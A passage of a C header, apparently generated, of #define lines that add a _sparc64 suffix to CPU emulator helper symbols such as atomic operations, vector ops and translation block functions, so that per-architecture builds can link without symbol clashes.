helper_atomic_cmpxchgw_be_mmu_sparc64 #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_sparc64 #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_sparc64 #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_sparc64 #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_sparc64 #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_sparc64 #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_sparc64 #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_sparc64 #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_sparc64 #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_sparc64 #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_sparc64 #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_sparc64 #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_sparc64 #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_sparc64 #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_sparc64 #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_sparc64 #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_sparc64 #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_sparc64 #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_sparc64 #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_sparc64 #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_sparc64 #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_sparc64 #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_sparc64 #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_sparc64 #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_sparc64 #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_sparc64 #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_sparc64 #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_sparc64 #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_sparc64 #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_sparc64 #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_sparc64 #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_sparc64 #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_sparc64 #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_sparc64 #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_sparc64 #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_sparc64 #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_sparc64 #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_sparc64 #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_sparc64 #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_sparc64 #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_sparc64 #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_sparc64 #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_sparc64 #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_sparc64 #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_sparc64 #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_sparc64 #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_sparc64 #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_sparc64 #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_sparc64 #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_sparc64 #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_sparc64 #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_sparc64 #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_sparc64 #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_sparc64 #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_sparc64 #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_sparc64 #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_sparc64 #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_sparc64 #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_sparc64 #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_sparc64 #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_sparc64 #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_sparc64 #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_sparc64 #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_sparc64 #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_sparc64 #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_sparc64 #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_sparc64 #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_sparc64 #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_sparc64 #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_sparc64 #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_sparc64 #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_sparc64 #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_sparc64 #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_sparc64 #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_sparc64 #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_sparc64 #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_sparc64 #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_sparc64 #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_sparc64 #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_sparc64 #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_sparc64 #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_sparc64 #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_sparc64 #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_sparc64 #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_sparc64 #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_sparc64 #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_sparc64 #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_sparc64 #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_sparc64 #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_sparc64 #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_sparc64 #define helper_atomic_xchgb helper_atomic_xchgb_sparc64 #define helper_atomic_fetch_addb helper_atomic_fetch_addb_sparc64 #define helper_atomic_fetch_andb helper_atomic_fetch_andb_sparc64 #define helper_atomic_fetch_orb helper_atomic_fetch_orb_sparc64 #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_sparc64 #define helper_atomic_add_fetchb helper_atomic_add_fetchb_sparc64 #define helper_atomic_and_fetchb helper_atomic_and_fetchb_sparc64 #define helper_atomic_or_fetchb helper_atomic_or_fetchb_sparc64 #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_sparc64 #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_sparc64 #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_sparc64 #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_sparc64 #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_sparc64 #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_sparc64 #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_sparc64 #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_sparc64 #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_sparc64 #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_sparc64 #define helper_atomic_xchgw_le helper_atomic_xchgw_le_sparc64 #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_sparc64 #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_sparc64 #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_sparc64 #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_sparc64 #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_sparc64 #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_sparc64 #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_sparc64 #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_sparc64 #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_sparc64 #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_sparc64 #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_sparc64 #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_sparc64 #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_sparc64 #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_sparc64 #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_sparc64 #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_sparc64 #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_sparc64 #define helper_atomic_xchgw_be helper_atomic_xchgw_be_sparc64 #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_sparc64 #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_sparc64 #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_sparc64 #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_sparc64 #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_sparc64 #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_sparc64 #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_sparc64 #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_sparc64 #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_sparc64 #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_sparc64 #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_sparc64 #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_sparc64 #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_sparc64 #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_sparc64 #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_sparc64 #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_sparc64 #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_sparc64 #define helper_atomic_xchgl_le helper_atomic_xchgl_le_sparc64 #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_sparc64 #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_sparc64 #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_sparc64 #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_sparc64 #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_sparc64 #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_sparc64 #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_sparc64 #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_sparc64 #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_sparc64 #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_sparc64 #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_sparc64 #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_sparc64 #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_sparc64 #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_sparc64 #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_sparc64 #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_sparc64 #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_sparc64 #define helper_atomic_xchgl_be helper_atomic_xchgl_be_sparc64 #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_sparc64 #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_sparc64 #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_sparc64 #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_sparc64 #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_sparc64 #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_sparc64 #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_sparc64 #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_sparc64 #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_sparc64 #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_sparc64 #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_sparc64 #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_sparc64 #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_sparc64 #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_sparc64 #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_sparc64 #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_sparc64 #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_sparc64 #define helper_atomic_xchgq_le helper_atomic_xchgq_le_sparc64 #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_sparc64 #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_sparc64 #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_sparc64 #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_sparc64 #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_sparc64 #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_sparc64 #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_sparc64 #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_sparc64 #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_sparc64 #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_sparc64 #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_sparc64 #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_sparc64 #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_sparc64 #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_sparc64 #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_sparc64 #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_sparc64 #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_sparc64 #define helper_atomic_xchgq_be helper_atomic_xchgq_be_sparc64 #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_sparc64 #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_sparc64 #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_sparc64 #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_sparc64 #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_sparc64 #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_sparc64 #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_sparc64 #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_sparc64 #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_sparc64 #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_sparc64 #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_sparc64 #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_sparc64 #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_sparc64 #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_sparc64 #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_sparc64 #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_sparc64 #define cpu_ldub_code cpu_ldub_code_sparc64 #define cpu_lduw_code cpu_lduw_code_sparc64 #define cpu_ldl_code cpu_ldl_code_sparc64 #define cpu_ldq_code cpu_ldq_code_sparc64 #define helper_div_i32 helper_div_i32_sparc64 #define helper_rem_i32 helper_rem_i32_sparc64 #define helper_divu_i32 helper_divu_i32_sparc64 #define helper_remu_i32 helper_remu_i32_sparc64 #define helper_shl_i64 helper_shl_i64_sparc64 #define helper_shr_i64 helper_shr_i64_sparc64 #define helper_sar_i64 helper_sar_i64_sparc64 #define helper_div_i64 helper_div_i64_sparc64 #define helper_rem_i64 helper_rem_i64_sparc64 #define helper_divu_i64 helper_divu_i64_sparc64 #define helper_remu_i64 helper_remu_i64_sparc64 #define helper_muluh_i64 helper_muluh_i64_sparc64 #define helper_mulsh_i64 helper_mulsh_i64_sparc64 #define helper_clz_i32 helper_clz_i32_sparc64 #define helper_ctz_i32 helper_ctz_i32_sparc64 #define helper_clz_i64 helper_clz_i64_sparc64 #define helper_ctz_i64 helper_ctz_i64_sparc64 #define helper_clrsb_i32 helper_clrsb_i32_sparc64 #define helper_clrsb_i64 helper_clrsb_i64_sparc64 #define helper_ctpop_i32 helper_ctpop_i32_sparc64 #define helper_ctpop_i64 helper_ctpop_i64_sparc64 #define helper_lookup_tb_ptr helper_lookup_tb_ptr_sparc64 #define helper_exit_atomic helper_exit_atomic_sparc64 #define helper_gvec_add8 helper_gvec_add8_sparc64 #define helper_gvec_add16 helper_gvec_add16_sparc64 #define helper_gvec_add32 helper_gvec_add32_sparc64 #define helper_gvec_add64 helper_gvec_add64_sparc64 #define helper_gvec_adds8 helper_gvec_adds8_sparc64 #define helper_gvec_adds16 helper_gvec_adds16_sparc64 #define helper_gvec_adds32 helper_gvec_adds32_sparc64 #define helper_gvec_adds64 helper_gvec_adds64_sparc64 #define helper_gvec_sub8 helper_gvec_sub8_sparc64 #define helper_gvec_sub16 helper_gvec_sub16_sparc64 #define helper_gvec_sub32 helper_gvec_sub32_sparc64 #define helper_gvec_sub64 helper_gvec_sub64_sparc64 #define helper_gvec_subs8 helper_gvec_subs8_sparc64 #define helper_gvec_subs16 helper_gvec_subs16_sparc64 #define helper_gvec_subs32 helper_gvec_subs32_sparc64 #define helper_gvec_subs64 helper_gvec_subs64_sparc64 #define helper_gvec_mul8 helper_gvec_mul8_sparc64 #define helper_gvec_mul16 helper_gvec_mul16_sparc64 #define helper_gvec_mul32 helper_gvec_mul32_sparc64 #define helper_gvec_mul64 helper_gvec_mul64_sparc64 #define helper_gvec_muls8 helper_gvec_muls8_sparc64 #define helper_gvec_muls16 helper_gvec_muls16_sparc64 #define helper_gvec_muls32 helper_gvec_muls32_sparc64 #define helper_gvec_muls64 helper_gvec_muls64_sparc64 #define helper_gvec_neg8 helper_gvec_neg8_sparc64 #define helper_gvec_neg16 helper_gvec_neg16_sparc64 #define helper_gvec_neg32 helper_gvec_neg32_sparc64 #define helper_gvec_neg64 helper_gvec_neg64_sparc64 #define helper_gvec_abs8 helper_gvec_abs8_sparc64 #define helper_gvec_abs16 helper_gvec_abs16_sparc64 #define helper_gvec_abs32 helper_gvec_abs32_sparc64 #define helper_gvec_abs64 helper_gvec_abs64_sparc64 #define helper_gvec_mov helper_gvec_mov_sparc64 #define helper_gvec_dup64 helper_gvec_dup64_sparc64 #define helper_gvec_dup32 helper_gvec_dup32_sparc64 #define helper_gvec_dup16 helper_gvec_dup16_sparc64 #define helper_gvec_dup8 helper_gvec_dup8_sparc64 #define helper_gvec_not helper_gvec_not_sparc64 #define helper_gvec_and helper_gvec_and_sparc64 #define helper_gvec_or helper_gvec_or_sparc64 #define helper_gvec_xor helper_gvec_xor_sparc64 #define helper_gvec_andc helper_gvec_andc_sparc64 #define helper_gvec_orc helper_gvec_orc_sparc64 #define helper_gvec_nand helper_gvec_nand_sparc64 #define helper_gvec_nor helper_gvec_nor_sparc64 #define helper_gvec_eqv helper_gvec_eqv_sparc64 #define helper_gvec_ands helper_gvec_ands_sparc64 #define helper_gvec_xors helper_gvec_xors_sparc64 #define helper_gvec_ors helper_gvec_ors_sparc64 #define helper_gvec_shl8i helper_gvec_shl8i_sparc64 #define helper_gvec_shl16i helper_gvec_shl16i_sparc64 #define helper_gvec_shl32i helper_gvec_shl32i_sparc64 #define helper_gvec_shl64i helper_gvec_shl64i_sparc64 #define helper_gvec_shr8i helper_gvec_shr8i_sparc64 #define helper_gvec_shr16i helper_gvec_shr16i_sparc64 #define helper_gvec_shr32i helper_gvec_shr32i_sparc64 #define helper_gvec_shr64i helper_gvec_shr64i_sparc64 #define helper_gvec_sar8i helper_gvec_sar8i_sparc64 #define helper_gvec_sar16i helper_gvec_sar16i_sparc64 #define helper_gvec_sar32i helper_gvec_sar32i_sparc64 #define helper_gvec_sar64i helper_gvec_sar64i_sparc64 #define helper_gvec_shl8v helper_gvec_shl8v_sparc64 #define helper_gvec_shl16v helper_gvec_shl16v_sparc64 #define helper_gvec_shl32v helper_gvec_shl32v_sparc64 #define helper_gvec_shl64v helper_gvec_shl64v_sparc64 #define helper_gvec_shr8v helper_gvec_shr8v_sparc64 #define helper_gvec_shr16v helper_gvec_shr16v_sparc64 #define helper_gvec_shr32v helper_gvec_shr32v_sparc64 #define helper_gvec_shr64v helper_gvec_shr64v_sparc64 #define helper_gvec_sar8v helper_gvec_sar8v_sparc64 #define helper_gvec_sar16v helper_gvec_sar16v_sparc64 #define helper_gvec_sar32v helper_gvec_sar32v_sparc64 #define helper_gvec_sar64v helper_gvec_sar64v_sparc64 #define helper_gvec_eq8 helper_gvec_eq8_sparc64 #define helper_gvec_ne8 helper_gvec_ne8_sparc64 #define helper_gvec_lt8 helper_gvec_lt8_sparc64 #define helper_gvec_le8 helper_gvec_le8_sparc64 #define helper_gvec_ltu8 helper_gvec_ltu8_sparc64 #define helper_gvec_leu8 helper_gvec_leu8_sparc64 #define helper_gvec_eq16 helper_gvec_eq16_sparc64 #define helper_gvec_ne16 helper_gvec_ne16_sparc64 #define helper_gvec_lt16 helper_gvec_lt16_sparc64 #define helper_gvec_le16 helper_gvec_le16_sparc64 #define helper_gvec_ltu16 helper_gvec_ltu16_sparc64 #define helper_gvec_leu16 helper_gvec_leu16_sparc64 #define helper_gvec_eq32 helper_gvec_eq32_sparc64 #define helper_gvec_ne32 helper_gvec_ne32_sparc64 #define helper_gvec_lt32 helper_gvec_lt32_sparc64 #define helper_gvec_le32 helper_gvec_le32_sparc64 #define helper_gvec_ltu32 helper_gvec_ltu32_sparc64 #define helper_gvec_leu32 helper_gvec_leu32_sparc64 #define helper_gvec_eq64 helper_gvec_eq64_sparc64 #define helper_gvec_ne64 helper_gvec_ne64_sparc64 #define helper_gvec_lt64 helper_gvec_lt64_sparc64 #define helper_gvec_le64 helper_gvec_le64_sparc64 #define helper_gvec_ltu64 helper_gvec_ltu64_sparc64 #define helper_gvec_leu64 helper_gvec_leu64_sparc64 #define helper_gvec_ssadd8 helper_gvec_ssadd8_sparc64 #define helper_gvec_ssadd16 helper_gvec_ssadd16_sparc64 #define helper_gvec_ssadd32 helper_gvec_ssadd32_sparc64 #define helper_gvec_ssadd64 helper_gvec_ssadd64_sparc64 #define helper_gvec_sssub8 helper_gvec_sssub8_sparc64 #define helper_gvec_sssub16 helper_gvec_sssub16_sparc64 #define helper_gvec_sssub32 helper_gvec_sssub32_sparc64 #define helper_gvec_sssub64 helper_gvec_sssub64_sparc64 #define helper_gvec_usadd8 helper_gvec_usadd8_sparc64 #define helper_gvec_usadd16 helper_gvec_usadd16_sparc64 #define helper_gvec_usadd32 helper_gvec_usadd32_sparc64 #define helper_gvec_usadd64 helper_gvec_usadd64_sparc64 #define helper_gvec_ussub8 helper_gvec_ussub8_sparc64 #define helper_gvec_ussub16 helper_gvec_ussub16_sparc64 #define helper_gvec_ussub32 helper_gvec_ussub32_sparc64 #define helper_gvec_ussub64 helper_gvec_ussub64_sparc64 #define helper_gvec_smin8 helper_gvec_smin8_sparc64 #define helper_gvec_smin16 helper_gvec_smin16_sparc64 #define helper_gvec_smin32 helper_gvec_smin32_sparc64 #define helper_gvec_smin64 helper_gvec_smin64_sparc64 #define helper_gvec_smax8 helper_gvec_smax8_sparc64 #define helper_gvec_smax16 helper_gvec_smax16_sparc64 #define helper_gvec_smax32 helper_gvec_smax32_sparc64 #define helper_gvec_smax64 helper_gvec_smax64_sparc64 #define helper_gvec_umin8 helper_gvec_umin8_sparc64 #define helper_gvec_umin16 helper_gvec_umin16_sparc64 #define helper_gvec_umin32 helper_gvec_umin32_sparc64 #define helper_gvec_umin64 helper_gvec_umin64_sparc64 #define helper_gvec_umax8 helper_gvec_umax8_sparc64 #define helper_gvec_umax16 helper_gvec_umax16_sparc64 #define helper_gvec_umax32 helper_gvec_umax32_sparc64 #define helper_gvec_umax64 helper_gvec_umax64_sparc64 #define helper_gvec_bitsel helper_gvec_bitsel_sparc64 #define cpu_restore_state cpu_restore_state_sparc64 #define page_collection_lock page_collection_lock_sparc64 #define page_collection_unlock page_collection_unlock_sparc64 #define free_code_gen_buffer free_code_gen_buffer_sparc64 #define tcg_exec_init tcg_exec_init_sparc64 #define tb_cleanup tb_cleanup_sparc64 #define tb_flush tb_flush_sparc64 #define tb_phys_invalidate tb_phys_invalidate_sparc64 #define tb_gen_code tb_gen_code_sparc64 #define tb_exec_lock tb_exec_lock_sparc64 #define tb_exec_unlock tb_exec_unlock_sparc64 #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_sparc64 #define tb_invalidate_phys_range tb_invalidate_phys_range_sparc64 #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_sparc64 #define tb_check_watchpoint tb_check_watchpoint_sparc64 #define cpu_io_recompile cpu_io_recompile_sparc64 #define tb_flush_jmp_cache tb_flush_jmp_cache_sparc64 #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_sparc64 #define translator_loop_temp_check translator_loop_temp_check_sparc64 #define translator_loop translator_loop_sparc64 #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_sparc64 #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_sparc64 #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_sparc64 #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_sparc64 #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_sparc64 #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_sparc64 #define unassigned_mem_ops unassigned_mem_ops_sparc64 #define floatx80_infinity floatx80_infinity_sparc64 #define dup_const_func dup_const_func_sparc64 #define gen_helper_raise_exception gen_helper_raise_exception_sparc64 #define gen_helper_raise_interrupt gen_helper_raise_interrupt_sparc64 #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_sparc64 #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_sparc64 #define gen_helper_cpsr_read gen_helper_cpsr_read_sparc64 #define gen_helper_cpsr_write gen_helper_cpsr_write_sparc64 #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_sparc64 #define helper_compute_psr helper_compute_psr_sparc64 #define helper_compute_C_icc helper_compute_C_icc_sparc64 #define cpu_sparc_set_id cpu_sparc_set_id_sparc64 #define cpu_sparc_init cpu_sparc_init_sparc64 #define helper_check_ieee_exceptions helper_check_ieee_exceptions_sparc64 #define helper_fadds helper_fadds_sparc64 #define helper_faddd helper_faddd_sparc64 #define helper_faddq helper_faddq_sparc64 #define helper_fsubs helper_fsubs_sparc64 #define helper_fsubd helper_fsubd_sparc64 #define helper_fsubq helper_fsubq_sparc64 #define helper_fmuls helper_fmuls_sparc64 #define 